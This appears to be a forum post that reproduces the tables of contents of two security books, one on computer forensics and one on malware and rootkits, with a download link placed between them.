▼ 5 Remote Investigations and Collections . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 97
Privacy Issues . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 98
Remote Investigations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 99
Remote Investigation Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 100
Remote Collections . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 112
Remote Collection Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 113
The Data Is Changing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 122
Policies and Procedures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 122
Encrypted Volumes or Drives . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 122
USB Thumb Drives . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 125
Part III Forensic Investigation Techniques
Case Study: Analyzing the Data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 128
Digging for Clues . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 128
We're Not Done. Yet. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 128
Finally . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 129
▼ 6 Microsoft Windows Systems Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 131
Windows File Systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 132
Master Boot Record . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 132
FAT File System . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 132
NTFS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 136
Recovering Deleted Files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 138
Limitations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 149
Windows Artifacts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 150
▼ 7 Linux Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 161
The Linux File System (ext2 and ext3) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 162
ext2 Structure . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 162
ext3/ext4 Structure . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 165
Linux Swap . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 166
Linux Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 166
00-FM.indd xiii 8/23/2009 3:54:44 AM
xiv Hacking Exposed Computer Forensics
▼ 8 Macintosh Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 175
The Evolution of the Mac OS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 176
Looking at a Mac Disk or Image . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 178
The GUID Partition Table . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 179
Partition Entry Array . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 180
Deleted Files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 186
Recovering Deleted Files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 189
Concatenating Unallocated Space . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 189
Scavenging for Unindexed Files and Pruned Nodes . . . . . . . . . . . . . 190
A Closer Look at Macintosh Files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 192
Archives . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 192
Date and Time Stamps . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 192
E-mail . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 192
Graphics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 193
Web Browsing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 193
Resources . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 193
Virtual Memory . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 194
System Log and Other System Files . . . . . . . . . . . . . . . . . . . . . . . . . . . 194
Mac as a Forensics Platform . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 195
▼ 9 Defeating Anti-forensic Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 197
Obscurity Methods . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 198
Privacy Measures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 205
Encryption . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 205
The General Solution to Encryption . . . . . . . . . . . . . . . . . . . . . . . . . . . 211
Wiping . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 212
▼ 10 Enterprise Storage Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 221
The Enterprise Data Universe . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 222
Rebuilding RAIDs in EnCase . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 223
Rebuilding RAIDs in Linux . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 223
Working with NAS Systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 224
Working with SAN Systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 225
Working with Tapes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 226
Accessing Raw Tapes on Windows . . . . . . . . . . . . . . . . . . . . . . . . . . . . 227
Accessing Raw Tapes on UNIX . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 228
Commercial Tools for Accessing Tapes . . . . . . . . . . . . . . . . . . . . . . . . . 229
Collecting Live Data from Windows Systems . . . . . . . . . . . . . . . . . . . 231
Full-Text Indexing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 231
Mail Servers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 234
▼ 11 E-mail Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 239
Finding E-mail Artifacts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 240
Converting E-mail Formats . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 241
Obtaining Web-based E-mail (Webmail) from Online Sources . . . . . . . . . . . 241
00-FM.indd xiv 8/23/2009 3:54:44 AM
Contents xv
Client-based E-mail . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 243
Web-Based E-mail . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 261
Internet-Hosted Mail . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 261
Investigating E-mail Headers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 267
▼ 12 Tracking User Activity . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 273
Microsoft Offi ce Forensics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 274
Tracking Web Usage . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 283
Internet Explorer Forensics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 283
Firefox/Mozilla Forensics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 291
Operating System User Logs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 298
UserAssist . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 298
▼ 13 Forensic Analysis of Mobile Devices . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 303
Collecting and Analyzing Mobile Device Evidence . . . . . . . . . . . . . . . . . . . . 305
Password-protected Windows Devices . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 331
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 338
Part IV Presenting Your Findings
Case Study: Wrapping Up the Case . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 340
He Said, She Said... . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 340
▼ 14 Documenting the Investigation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 341
Read Me . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 342
Internal Report . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 343
Construction of an Internal Report . . . . . . . . . . . . . . . . . . . . . . . . . . . . 344
Declaration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 346
Construction of a Declaration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 347
Affi davit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 350
Expert Report . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 351
Construction of an Expert Report . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 352
▼ 15 The Justice System . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 357
The Criminal Court System . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 358
The Civil Justice System . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 359
Phase One: Investigation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 360
Phase Two: Commencing Suit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 360
Phase Three: Discovery . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 361
Phase Four: Trial . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 364
Expert Status . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 364
Expert Credentials . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 364
Nontestifying Expert Consultant . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 364
Testifying Expert Witness . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 365
00-FM.indd xv 8/23/2009 3:54:44 AM
xvi Hacking Exposed Computer Forensics
Court-Appointed Expert . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 365
Expert Interaction with the Court . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 365
Part V Putting It All Together
Case Study: Now What? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 368
Mr. Blink Becomes an Investigator . . . . . . . . . . . . . . . . . . . . . . . . . . . . 368
Time to Understand the Business Issues . . . . . . . . . . . . . . . . . . . . . . . . 368
▼ 16 IP Theft . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 369
What Is IP Theft? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 370
IP Theft Ramifi cations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 371
Loss of Customers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 372
Loss of Competitive Advantage . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 372
Monetary Loss . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 372
Types of Theft . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 373
Technology . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 378
Tying It Together . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 389
What Was Taken? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 389
Looking at Intent . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 390
Estimating Damages . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 390
Working with Higher-Ups . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 391
Working with Outside Counsel . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 392
▼ 17 Employee Misconduct . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 393
What Is Employee Misconduct? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 394
Ramifi cations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 395
Disruptive Work Environment . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 395
Investigations by Authorities . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 396
Lawsuits Against an Employer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 396
Monetary Loss . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 397
Types of Misconduct . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 398
Inappropriate Use of Corporate Resources . . . . . . . . . . . . . . . . . . . . . 399
Making Sense of It All . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 402
Employment Discrimination/Harassment . . . . . . . . . . . . . . . . . . . . . . 404
Violation of Non-compete/Non-solicitation Agreements . . . . . . . . . 407
Tying It Together . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 412
What Is the Risk to the Company? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 413
Looking at Intent . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 413
Estimating Damages . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 414
Working with Higher-Ups . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 414
Working with Outside Counsel . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 415
00-FM.indd xvi 8/23/2009 3:54:44 AM
Contents xvii
▼ 18 Employee Fraud . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 417
What Is Employee Fraud? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 418
Ramifi cations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 419
Monetary Loss . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 419
Investigations by Authorities . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 419
Criminal Penalties and Civil Lawsuits . . . . . . . . . . . . . . . . . . . . . . . . . 420
Types of Employee Fraud . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 420
Asset Misappropriation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 421
Corruption . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 427
Tying It Together . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 432
What Is the Story? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 432
Estimating Losses . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 433
Working with Higher-Ups . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 433
Working with Outside Counsel and Investigators . . . . . . . . . . . . . . . 434
▼ 19 Corporate Fraud . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 435
What Is Corporate Fraud? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 437
Ramifi cations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 437
Impact to Shareholders and the Public . . . . . . . . . . . . . . . . . . . . . . . . . 437
Regulatory Changes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 438
Investigations and Litigation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 439
Types of Corporate Fraud . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 439
Accounting Fraud . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 440
Securities Fraud . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 444
▼ 20 Organized Cyber Crime . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 453
The Changing Landscape of Hacking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 454
The Russian Business Network . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 455
Infrastructure and Bot-Nets . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 455
The Russian-Estonian Confl ict . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 456
Effects on Western Companies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 456
Types of Hacks and the Role of Computer Forensics . . . . . . . . . . . . . . . . . . . 457
Bot/Remote Control Malware . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 457
Traditional Hacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 463
Money Laundering . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 465
Anti-Money Laundering Software . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 465
The Mechanics of Laundering . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 466
The Role of Computer Forensics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 467
▼ 21 Consumer Fraud . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 471
What Is Consumer Fraud? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 473
Ramifi cations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 473
Impact to Consumers and the Public . . . . . . . . . . . . . . . . . . . . . . . . . . 474
Regulatory Environment . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 474
Investigations and Litigation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 474
00-FM.indd xvii 8/23/2009 3:54:44 AM
xviii Hacking Exposed Computer Forensics
Types of Consumer Fraud . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 475
Identity Theft . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 475
Investment Fraud . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 482
Mortgage Fraud . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 486
Tying It Together . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 491
▼ A Searching Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 493
Regular Expressions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 494
Theory and History . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 494
The Building Blocks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 494
Constructing Regular Expressions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 495
▼ Index . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 499




Enlace de descarga:
Código: text
https://jumpshare.com/v/ZOdcHOnjdR2TpcS0hE7l
#34

Código: text
1 Method of Infection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
This Security Stuff Might Actually Work . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8
Decrease in Operating System Vulnerabilities . . . . . . . . . . . . . . . . . . . 9
Perimeter Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10
Why They Want Your Workstation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11
Intent Is Hard to Detect . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12
It's a Business . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
Signifi cant Malware Propagation Techniques . . . . . . . . . . . . . . . . . . . . . . . . . 14
Social Engineering . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15
File Execution . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17
Modern Malware Propagation Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . 21
StormWorm (Malware Sample: trojan.peacomm) . . . . . . . . . . . . . . . . 22
Metamorphism (Malware Sample: W32.Evol, W32.Simile) . . . . . . . . 24
Obfuscation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
Dynamic Domain Name Services (Malware Sample:
W32.Reatle.E@mm) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 29
Fast Flux (Malware Sample: trojan.peacomm) . . . . . . . . . . . . . . . . . . . 29
Malware Propagation Injection Vectors . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31
Email . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31
Malicious Websites . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35
Phishing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 37
Peer-To-Peer (P2P) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 43
Worms . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46
x Hacking Exposed Malware & Rootkits
Samples from the Companion Website . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 47
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 48
▼ 2 Malware Functionality . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 49
What Malware Does Once It's Installed . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 50
Pop-Ups . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 50
Search Engine Redirection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 54
Data Theft . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 62
Click Fraud . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 63
Identity Theft . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 65
Keylogging . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 69
Malware Behaviors . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 73
Identifying Installed Malware . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 76
Typical Install Locations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 76
Installing on Local Drives . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 77
Modifying Timestamps . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 77
Affecting Processes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 77
Disabling Services . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 78
Modifying the Windows Registry . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 79
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 79
Part II Rootkits
Case Study: The Invisible Rootkit That Steals Your Bank Account Data . . . 82
Disk Access . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 83
Firewall Bypassing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 83
Backdoor Communication . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 83
Intent . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 84
▼ 3 User-Mode Rootkits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 85
Maintain Access . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 86
Network-Based Backdoors . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 87
Stealth: Conceal Existence . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 87
Types of Rootkits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 88
Timeline . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 89
User-Mode Rootkits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 89
What Are User-Mode Rootkits? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 91
Background Technologies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 92
Injection Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 94
Hooking Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 106
User-Mode Rootkit Examples . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 107
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 117
Contents xi
▼ 4 Kernel-Mode Rootkits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 119
Ground Level: x86 Architecture Basics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 120
Instruction Set Architectures and the Operating System . . . . . . . . . . 121
Protection Rings . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 121
Bridging the Rings . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 123
Kernel Mode: The Digital Wild West . . . . . . . . . . . . . . . . . . . . . . . . . . . 123
The Target: Windows Kernel Components . . . . . . . . . . . . . . . . . . . . . . . . . . . . 124
The Win32 Subsystem . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 124
What Are These APIs Anyway? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 126
The Concierge: NTDLL.DLL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 126
Functionality by Committee: The Windows Executive
(NTOSKRNL.EXE) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 127
The Windows Kernel (NTOSKRNL.EXE) . . . . . . . . . . . . . . . . . . . . . . . 127
Device Drivers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 128
The Windows Hardware Abstraction Layer (HAL) . . . . . . . . . . . . . . 128
Kernel Driver Concepts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 129
Kernel-Mode Driver Architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 129
Gross Anatomy: A Skeleton Driver . . . . . . . . . . . . . . . . . . . . . . . . . . . . 131
WDF, KMDF, and UMDF . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 132
Kernel-Mode Rootkits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 133
